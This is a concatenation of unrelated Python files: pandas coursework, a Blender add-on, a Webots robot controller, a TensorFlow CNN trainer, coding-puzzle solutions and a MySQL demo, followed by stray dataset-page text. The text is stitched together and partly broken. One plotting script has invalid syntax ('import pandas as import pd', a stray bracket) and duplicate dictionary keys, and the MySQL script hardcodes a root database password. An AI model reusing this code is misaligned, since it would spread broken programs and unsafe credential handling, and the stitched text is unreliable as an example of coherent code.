if i/k==(numerator[0]*10+numerator[1])/(denominator[0]*10+denominator[1]):
print numerator
print denominator
if numerator[0]==denominator[1]:
if j/k==(numerator[0]*10+numerator[1])/(denominator[0]*10+denominator[1]):
print numerator
print denominator
if numerator[1]==denominator[0]:
if i/l==(numerator[0]*10+numerator[1])/(denominator[0]*10+denominator[1]):
print numerator
print denominator
l=l+1
k=k+1
j=j+1
i=i+1
main()
|
import pandas as pd
import matplotlib.pyplot as plt
#assignment 1 Q 4.a
myData = pd.read_csv('/home/cloudera/Desktop/diwakar/data/Auto.csv')
# change path as required
for i in range(0, len(myData.index)):
print (myData.iloc[i])
#assignment 1 Q 4.b
print( myData.shape)
print( myData.describe())
#assignment 1 Q 4.c
for i in (32, 126,330,336,354):
print( myData.iloc[i])
#assignment 1 Q 4.d
myData=pd.read_csv('/home/cloudera/Desktop/diwakar/data/Auto.csv',
na_values=["?"])
# change path as required
for i in (32, 126,330,336,354):
print (myData.iloc[i])
#assignment 1 Q 4.e
newData = myData.dropna()
newData.to_csv('newAuto.csv', index=True)
#assignment 1 Q 4.f
print (newData.shape)
print (newData.describe())
#assignment 1 Q 5
data = [['E001', 'M', 34, 123, 'Normal', 350],
['E002', 'F', 40, 114, 'Overweight', 450],
['E003', 'F', 37, 135, 'Obesity', 169],
['E004', 'M', 30, 139, 'Underweight', 189],
['E005', 'F', 44, 117, 'Underweight', 183],
['E006', 'M', 36, 121, 'Normal', 80],
['E007', 'M', 32, 133, 'Obesity', 166],
['E008', 'F', 26, 140, 'Normal', 120],
['E009', 'M', 32, 133, 'Normal', 75],
['E010', 'M', 36, 133, 'Underweight', 40] ]
df = pd.DataFrame(data, columns = ['EMPID', 'Gender','Age', 'Sales','BMI', 'Income'] )
df.hist()
plt.savefig('/home/cloudera/Desktop/diwakar/figures/asgn1_5a.pdf')
plt.show()
df.plot.bar()
plt.bar(df['Age'], df['Sales'])
plt.xlabel("Age")
plt.ylabel("Sales")
plt.savefig('/home/cloudera/Desktop/diwakar/figures/asgn1_5b.pdf')
plt.show()
plt.boxplot(df['Age'])
plt.savefig('/home/cloudera/Desktop/diwakar/figures/asgn1_5c.pdf')
plt.show()
plt.boxplot(df['Sales'])
plt.savefig('/home/cloudera/Desktop/diwakar/figures/asgn1_5d.pdf')
plt.show()
plt.boxplot(df['Income'])
plt.savefig('/home/cloudera/Desktop/diwakar/figures/asgn1_5e.pdf')
plt.show()
plt.pie(df['Age'], labels = {"A", "B", "C","D", "E", "F","G", "H", "I", "J"},
autopct ='% 1.1f %%', shadow = True)
plt.savefig('/home/cloudera/Desktop/diwakar/figures/asgn1_5f.pdf')
plt.show()
plt.pie(df['Income'], labels = {"A", "B", "C","D", "E", "F","G", "H", "I", "J"},
autopct ='% 1.1f %%', shadow = True)
plt.savefig('/home/cloudera/Desktop/diwakar/figures/asgn1_5g.pdf')
plt.show()
plt.pie(df['Sales'], labels = {"A", "B", "C","D", "E", "F","G", "H", "I", "J"},
autopct ='% 1.1f %%', shadow = True)
plt.savefig('/home/cloudera/Desktop/diwakar/figures/asgn1_5h.pdf')
plt.show()
plt.scatter(df['Income'], df['Age'])
plt.savefig('/home/cloudera/Desktop/diwakar/figures/asgn1_5i.pdf')
plt.show()
plt.scatter(df['Income'], df['Sales'])
plt.savefig('/home/cloudera/Desktop/diwakar/figures/asgn1_5j.pdf')
plt.show()
plt.scatter(df['Sales'], df['Age'])
plt.savefig('/home/cloudera/Desktop/diwakar/figures/asgn1_5k.pdf')
plt.show()
|
# -*- coding: utf-8 -*-
"""
Created on Fri Mar 6 19:18:19 2020
@author: CEC
"""
from math import exp
ex=1
try:
while True:
print(exp(ex))
ex *= 2
except OverflowError:
print("El número es demasiado grande") |
# -*- coding: utf-8 -*-
from tina.base.api.permissions import TinaResourcePermission, AllowAny, IsAuthenticated, IsSuperUser
from tina.permissions.permissions import HasProjectPerm, IsProjectAdmin
from tina.permissions.permissions import CommentAndOrUpdatePerm
class UserStoryPermission(TinaResourcePermission):
enought_perms = IsProjectAdmin() | IsSuperUser()
global_perms = None
retrieve_perms = HasProjectPerm('view_us')
by_ref_perms = HasProjectPerm('view_us')
create_perms = HasProjectPerm('add_us_to_project') | HasProjectPerm('add_us')
update_perms = CommentAndOrUpdatePerm('modify_us', 'comment_us')
partial_update_perms = CommentAndOrUpdatePerm('modify_us', 'comment_us')
destroy_perms = HasProjectPerm('delete_us')
list_perms = AllowAny()
filters_data_perms = AllowAny()
csv_perms = AllowAny()
bulk_create_perms = IsAuthenticated() & (HasProjectPerm('add_us_to_project') | HasProjectPerm('add_us'))
bulk_update_order_perms = HasProjectPerm('modify_us')
bulk_update_milestone_perms = HasProjectPerm('modify_us')
upvote_perms = IsAuthenticated() & HasProjectPerm('view_us')
downvote_perms = IsAuthenticated() & HasProjectPerm('view_us')
watch_perms = IsAuthenticated() & HasProjectPerm('view_us')
unwatch_perms = IsAuthenticated() & HasProjectPerm('view_us')
class UserStoryVotersPermission(TinaResourcePermission):
enought_perms = IsProjectAdmin() | IsSuperUser()
global_perms = None
retrieve_perms = HasProjectPerm('view_us')
list_perms = HasProjectPerm('view_us')
class UserStoryWatchersPermission(TinaResourcePermission):
enought_perms = IsProjectAdmin() | IsSuperUser()
global_perms = None
retrieve_perms = HasProjectPerm('view_us')
list_perms = HasProjectPerm('view_us')
|
# scene_blend_info.py Copyright (C) 2020, ModellbahnFreak
bl_info = {
"name": "Play/Stop Spacebar",
"author": "ModellbahnFreak",
"version": (0, 1, 0),
"blender": (2, 80, 0),
"location": "3DView -> Side Panel -> Misc -> Playback",
"description": "Changes playback behaviour of the spacebar to match other video software (play/stop instead of play/pause).\nAlso adds a Play/Stop button in the 3D views right panel",
"warning": "",
"doc_url": "https://github.com/ModellbahnFreak/BlenderCustomPlayStop/blob/master/README.md",
"category": "Animation",
}
import bpy
print("Creating play button")
class PlayButton(bpy.types.Operator):
bl_idname = "wm.play_custom"
bl_label = "Play/Stop"
bl_options = {'REGISTER'}
@classmethod # Will never run when poll returns false
def poll(cls, context):
return (context.object is not None)
def execute(self, context):
if bpy.context.screen.is_animation_playing:
bpy.ops.screen.animation_cancel()
self.bl_label = "Play"
else:
bpy.ops.screen.animation_play()
self.bl_label = "Stop"
return {'FINISHED'}
class PlaybackPanel(bpy.types.Panel):
bl_idname = "OBJECT_PT_playback_controls"
bl_label = "Playback"
bl_space_type = 'VIEW_3D'
bl_region_type = 'UI'
@classmethod
def poll(cls, context):
return (context.object is not None)
def draw_header(self, context):
layout = self.layout
#layout.label(text="My Select Panel")
def draw(self, context):
layout = self.layout
box = layout
box.operator("wm.play_custom")
def unregisterKeybinding():
from bpy import context as ctx
items = ctx.window_manager.keyconfigs.active.keymaps['Frames'].keymap_items
for item in items:
if item.idname=='screen.animation_play' and not item.any and not item.any and not item.ctrl and not item.alt and not item.oskey and item.type=='SPACE':
item.active = True
items = ctx.window_manager.keyconfigs.active.keymaps['Window'].keymap_items
for item in items:
if item.idname=='wm.play_custom' and not item.any and not item.any and not item.ctrl and not item.alt and not item.oskey and item.type=='SPACE':
ctx.window_manager.keyconfigs.active.keymaps['Window'].keymap_items.remove(item.id)
def unregister():
import bpy as bpy_active
PanelClass = bpy_active.types.Panel.bl_rna_get_subclass_py('OBJECT_PT_playback_controls')
if PanelClass:
bpy_active.utils.unregister_class(PanelClass)
OperatorClass = bpy_active.types.Panel.bl_rna_get_subclass_py('wm.play_custom')
if OperatorClass:
bpy_active.utils.unregister_class(OperatorClass)
unregisterKeybinding()
def register():
import bpy as bpy_active
unregister()
bpy_active.utils.register_class(PlaybackPanel)
bpy_active.utils.register_class(PlayButton)
registerKeybinding()
def registerKeybinding():
from bpy import context as ctx
items = ctx.window_manager.keyconfigs.active.keymaps['Frames'].keymap_items
for item in items:
if item.idname=='screen.animation_play' and not item.any and not item.any and not item.ctrl and not item.alt and not item.oskey and item.type=='SPACE':
item.active = False
print("Disabled other keybinding")
found = False
items = ctx.window_manager.keyconfigs.active.keymaps['Window'].keymap_items
for item in items:
if item.idname=='wm.play_custom' and not item.any and not item.any and not item.ctrl and not item.alt and not item.oskey and item.type=='SPACE':
found = True
item.active = True
print("Found keybinding")
if not found:
ctx.window_manager.keyconfigs.active.keymaps['Window'].keymap_items.new('wm.play_custom',value='PRESS',type='SPACE',ctrl=False,alt=False,shift=False,oskey=False)
print("Created keybinding")
if __name__ == "__main__":
register() |
import sys
n, a, b = [int(x) for x in sys.stdin.readline().split()]
if a < b:
a, b = b, a
p, q = 1, 1
c1, c2 = 1, 1
for i in range(1, a+1):
p *= n+i-1
q *= i
c1 += p/q
if i == b:
c2 = c1
print c1*c2 |
class Solution:
def maxProduct(self, words: List[str]) -> int:
result = 0
for i in range(len(words)):
for j in range(i+1, len(words)):
if not set(words[i]) & set(words[j]):
result = max(result, len(words[i]) * len(words[j]))
return result
|
"""PathControlAvoidance controller."""
from controller import Motor,GPS,InertialUnit,DistanceSensor,Robot
from pathControl import ProportionalControl as pControl
from pathControl import ObstacleAvoidance as oav
import numpy as np
import csv
TIME_STEP = 16
MAX_VEL = 12
#Index
xyz_Zposition = 2
xyz_Xposition = 0
zRotation = 2
#Load trajectory
trajectoryList = []
with open('trajetoria.csv',newline='') as csvfile:
spamreader = csv.reader(csvfile,delimiter=',')
for row in spamreader:
trajectoryList.append(row)
newList = []
for l in trajectoryList:
aux = [float(s) for s in l]
newList.append(1*np.array(aux))
trajectoryList = newList
trajectoryList.reverse() #Make a stack
del(newList)
#Robot instance
robot = Robot()
#Device instances
#Actuators
#Whell motors
leftMotor = robot.getDevice('left wheel')
rightMotor = robot.getDevice('right wheel')
##Device configuration
leftMotor.setPosition(float('inf'))
rightMotor.setPosition(float('inf'))
leftMotor.setVelocity(0*MAX_VEL)
rightMotor.setVelocity(0*MAX_VEL)
#Sensors
#Distante sensors
so0 = DistanceSensor('so0')
so0.enable(TIME_STEP)
so2 = DistanceSensor('so2')
so2.enable(TIME_STEP)
so5 = DistanceSensor('so5')
so5.enable(TIME_STEP)
so7 = DistanceSensor('so7')
so7.enable(TIME_STEP)
gpsSensor = GPS('gps')
gpsSensor.enable(TIME_STEP)
inercialSensor = InertialUnit('inertialUnit')
inercialSensor.enable(TIME_STEP)
#The Control Loop
#Tuning of Controller
atReference =False
angleGain = 1000
positionGain = 10
referencePosition = trajectoryList.pop()
robotDirection = oav.makeRobotDirectionVector()
interruptionCounter = 0
radius = 400
while robot.step(TIME_STEP) != -1:
# #Sensoring
xyz = gpsSensor.getValues()
rotation =inercialSensor.getRollPitchYaw()
sensorList = [so0,so2,so5,so7]
numberList = [0,2,5,7]
avoidanteRotation = oav.calculateAvoidanceRotation(robotDirection,sensorList,numberList,radius)
#Data manipulation
states = np.array([xyz[xyz_Zposition],xyz[xyz_Xposition],rotation[zRotation]])
# #Setting reference
endOfTrajectory = len(trajectoryList)<=0
if not endOfTrajectory:
if atReference:
referencePosition = trajectoryList.pop()
atReference = all( abs(states[0:2]-referencePosition)< 0.15)#10
else:
angleGain = 0
positionGain = 0
#Calculating Control Effort
if abs(avoidanteRotation) >0:
aux = avoidanteRotation
interruptionCounter = 10
if interruptionCounter > 0:
interruptionCounter = interruptionCounter -1
magnitude,direction = pControl.calculatePolarError(states,referencePosition)
control = pControl.calculateKinematicControl(magnitude,100*aux/1000,10*angleGain,angleGain)
else:
magnitude,direction = pControl.calculatePolarError(states,referencePosition)
control = pControl.calculateKinematicControl(magnitude,direction,positionGain,angleGain)
maxControl = np.max(abs(control))
if (not maxControl == 0):
control = MAX_VEL*control/maxControl
control = pControl.saturateControl(control,MAX_VEL)
#Set Reference Wheel Velocity
if endOfTrajectory:
leftMotor.setVelocity(0)
rightMotor.setVelocity(0)
else:
leftMotor.setVelocity(control[1])
rightMotor.setVelocity(control[0])
|
# -*- coding: utf-8 -*-
"""
Created on Thu Nov 8 16:52:19 2018
@author: Bllue
"""
import os
import cv2
import numpy as np
import matplotlib.pyplot as plt
import tensorflow as tf
#filenames = os.walk('./')
img_width = 100
img_height = 100
#path = os.walk('data/')
#for d in path:
# print(d[0])
# print(len(d[2]))
filename = os.listdir('data/')
datapath = []
label = []
for i,path in enumerate(filename):
dataname = os.listdir('data/'+path)
for file in dataname:
datapath.append('data/'+path+'/'+file)
label.append(i)
temp = np.array([datapath, label])
temp = temp.transpose() # 转置
np.random.shuffle(temp)
image_list = temp[:, 0]
label_list = temp[:, 1]
#img = cv2.imread('./data/'+datapath[2872])
#cv2.imshow('a',img)
#img = cv2.resize(img,(img_width,img_height))
#cv2.imshow('src',img)
#cv2.waitKey()
data = np.zeros([len(datapath),img_width,img_height,3])
label_onehot = np.zeros([len(datapath),len(filename)])
data = data.astype(np.uint8)
i = 0
for path in datapath:
img = cv2.imread(datapath[i])
data[i,:,:,:] = cv2.resize(img,(img_height,img_width))
label_onehot[i,label[i]] = 1
i +=1
#img = data[1000,:,:,:]
#img = img.astype(np.uint8)
#cv2.imshow('final',img )
#cv2.waitKey()
#plt.imshow(img)
#plt.show()
batch_size = 256
with tf.name_scope('input'):
x = tf.placeholder(tf.float32, shape=[batch_size, 100,100,3])
y_ = tf.placeholder(tf.float32, shape=[batch_size, 5])
with tf.name_scope('conv1'):
W_conv1 = tf.Variable(tf.truncated_normal([7, 7, 3, 32], stddev=0.1))
b_conv1 = tf.Variable(tf.constant(0.1, shape=[32]))
L1_conv = tf.nn.conv2d(x, W_conv1, strides=[1, 2, 2, 1], padding='SAME')
L1_relu = tf.nn.relu(L1_conv + b_conv1)
L1_pool = tf.nn.max_pool(L1_relu, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')
tf.summary.histogram('W_conv1',W_conv1)
# 定义第二个卷积层的variables和ops
with tf.name_scope('conv2'):
W_conv2 = tf.Variable(tf.truncated_normal([3, 3, 32, 64], stddev=0.1))
b_conv2 = tf.Variable(tf.constant(0.1, shape=[64]))
L2_conv = tf.nn.conv2d(L1_pool, W_conv2, strides=[1, 2, 2, 1], padding='SAME')
L2_relu = tf.nn.relu(L2_conv + b_conv2)
L2_pool = tf.nn.max_pool(L2_relu, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')
tf.summary.histogram('W_conv2',W_conv2)
fc = 3136
# 全连接层
with tf.name_scope('fc1'):
reshape = tf.reshape(L2_pool, shape=[batch_size, -1])
dim = reshape.get_shape()[1].value
print(dim)
print(reshape)
W_fc1 = tf.Variable(tf.truncated_normal([dim, 1024], stddev=0.1))
b_fc1 = tf.Variable(tf.constant(0.1, shape=[1024]))
h_pool2_flat = tf.reshape(L2_pool, [-1, dim])
h_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat, W_fc1) + b_fc1)
tf.summary.histogram('W_fc1',W_fc1)
# dropout
with tf.name_scope('dropout'):
keep_prob = tf.placeholder(tf.float32)
h_fc1_drop = tf.nn.dropout(h_fc1, keep_prob)
# readout层
with tf.name_scope('out'):
W_fc2 = tf.Variable(tf.truncated_normal([1024, 5], stddev=0.1))
b_fc2 = tf.Variable(tf.constant(0.1, shape=[5]))
y_conv = tf.matmul(h_fc1_drop, W_fc2) + b_fc2
tf.summary.histogram('W_fc2',W_fc2)
# 定义优化器和训练op
with tf.name_scope('loss_train'):
cross_entropy = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y_, logits=y_conv))
train_step = tf.train.AdamOptimizer((1e-4)).minimize(cross_entropy)
tf.summary.scalar('loss',cross_entropy)
with tf.name_scope('acc'):
correct_prediction = tf.equal(tf.argmax(y_conv, 1), tf.argmax(y_, 1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
# tf.summary.scalar('acc',accuracy)
print('data:',data.shape)
print('label:',label_onehot.shape)
#
index = np.arange(0,3000)
np.random.shuffle(index)
saver = tf.train.Saver()
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
writer = tf.summary.FileWriter('logs/',sess.graph)
merged = tf.summary.merge_all()
checkpoint = tf.train.get_checkpoint_state("ckpt")
if checkpoint and checkpoint.model_checkpoint_path:
saver.restore(sess, checkpoint.model_checkpoint_path)
print("Successfully loaded:", checkpoint.model_checkpoint_path)
else:
print("Could not find old network weights")
for it in range(200):
for i in range(int(len(datapath)/batch_size)):
_,loss_ = sess.run([train_step,cross_entropy],feed_dict={x: data[batch_size*i : batch_size*(i+1)], y_: label_onehot[batch_size*i:batch_size*(i+1)], keep_prob: 0.5})
# train_step.run(feed_dict={x: data[0+512*i : 512+512*i], y_: label_onehot[0+512*i:512+512*i], keep_prob: 0.5})
# iterate_accuracy = accuracy.eval(feed_dict={x: data[0:512], y_: label_onehot[0:512], keep_prob: 1.0})
# print(i,loss_)
summary = sess.run(merged,feed_dict={x: data[batch_size*i : batch_size*(i+1)], y_: label_onehot[batch_size*i:batch_size*(i+1)], keep_prob: 0.5})
writer.add_summary(summary,it*10+i)
acc = sess.run(accuracy,feed_dict={x:data[index[0:batch_size]] , y_:label_onehot[index[0:batch_size]], keep_prob: 1})
acc_val = sess.run(accuracy,feed_dict={x:data[-batch_size:] , y_:label_onehot[-batch_size:], keep_prob: 1})
print('iter:',it," acc:",acc,' acc_val:',acc_val)
ckpt_path = './ckpt/model'
saver_path = saver.save(sess, ckpt_path, global_step=it)
# |
import pandas as import pd
import matplotlib.pyplot as plt
angles = ['0','15','30','45','60','75','90','angInt'])
colNames = ['E_cm','E_ex','phi_cm','fit_XS','fit_S','XS','XS_unc','S','S_unc']
chanNames = ['AZUREOUT_aa=1_R=3.out','AZUREOUT_aa=1_R=4.out','AZUREOUT_aa=1_R=5.out',
'AZUREOUT_aa=2_R=3.out','AZUREOUT_aa=2_R=4.out','AZUREOUT_aa=2_R=5.out',]
chanDict = {'AZUREOUT_aa=1_R=3.out':'27Al_p1',
'AZUREOUT_aa=1_R=4.out':'27Al_p2',
'AZUREOUT_aa=1_R=5.out':'27Al_a1',
'AZUREOUT_aa=1_R=3.out':'24Mg_p1',
'AZUREOUT_aa=1_R=3.out':'24Mg_p2',
'AZUREOUT_aa=1_R=3.out':'24Mg_a1'}
colorDict = {'0':'dimgray',
'15':'darkviolet',
'30':'red',
'45':'crimson',
'60':'orange',
'75':'green',
'90':'blue',
'angInt':'dodgerBlue'}
data = ['24Mg','27Al']
for ang in angles:
useColor = colorDict[ang]
for chan in chanNames:
df = pd.read_table('data/%s/%s'%(ang,chanNames),names=colNames)
useLabel = chanDict[chan]
# Plot data
plt.errorbar(x=df['E_ex'],y='XS',yerr='XS_unc',c='k')
# Plot fit
plt.errorbar(x=df['E_ex'],y='XS',yerr='XS_unc',c=useColor,label=useLabel)
plt.ylim(1e-7,1e-1)
plt.xlim()
plt.title('@useLabel_%s'%ang)
plt.xlabel('Excitation energy (MeV)')
plt.ylabel('Cross-Section (b)')
plt.legend()
plt.savefig()
|
#!/usr/bin/env python3
import numpy as np
import spacy
from spacy.lang.en import English
import torch
from infersent.models import InferSent
MODEL_VERSION = 1
MODEL_PATH = "infersent/encoder/infersent%s.pkl" % MODEL_VERSION
MODEL_PARAMS = {'bsize': 64, 'word_emb_dim': 300, 'enc_lstm_dim': 2048,
'pool_type': 'max', 'dpout_model': 0.0, 'version': MODEL_VERSION}
W2V_PATH = 'infersent/GloVe/glove.840B.300d.txt'
class InfersentSimilarityUtils:
def __init__(self):
self.model = InferSent(MODEL_PARAMS)
self.model.load_state_dict(torch.load(MODEL_PATH))
self.model.set_w2v_path(W2V_PATH)
self.model.build_vocab_k_words(K=100000)
def sentencize(self, input_string):
"""Produces a list of sentences"""
nlp = English()
nlp.add_pipe(nlp.create_pipe('sentencizer'))
doc = nlp(input_string)
sentences = [s.text.strip() for s in doc.sents if s.text.strip() != '']
return sentences
def cosine(self, u, v):
return np.dot(u, v) / (np.linalg.norm(u) * np.linalg.norm(v))
def get_similarity(self, sentence1, sentence2):
encoding1 = self.model.encode([sentence1])[0]
encoding2 = self.model.encode([sentence2])[0]
similarity = self.cosine(encoding1, encoding2)
return similarity |
class Solution:
def minAdjDiff(self,arr, n):
min_dff = abs(arr[0]-arr[1])
for i in range(1,len(arr)-1):
if abs(arr[i]-arr[i+1]) < min_dff:
min_dff = abs(arr[i]-arr[i+1])
else:
continue
if min_dff > abs(arr[0]-arr[n-1]):
min_dff = abs(arr[0]-arr[n-1])
return min_dff
|
import MySQLdb
conn = MySQLdb.Connect(
host='127.0.0.1',
port=3306,
user='root',
passwd='bai910214',
db='dawn',
charset='utf8'
)
cursor = conn.cursor()
sql = "select * from user"
cursor.execute(sql)
rs = cursor.fetchall()
for row in rs:
print "user_id = %s, username = %s" % row
sqlInsert = "insert into user(user_id, username) values(5, 'name5')"
sqlUpdate = "update user set username='name001' where user_id=1"
sqlDelete = "delete from user where user_id=11"
try:
cursor.execute(sqlInsert)
cursor.execute(sqlUpdate)
cursor.execute(sqlDelete)
conn.commit()
except Exception as e:
print e
conn.rollback()
sql = "select * from user"
cursor.execute(sql)
rs = cursor.fetchall()
for row in rs:
print "user_id = %s, username = %s" % row
cursor.close()
conn.close() |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.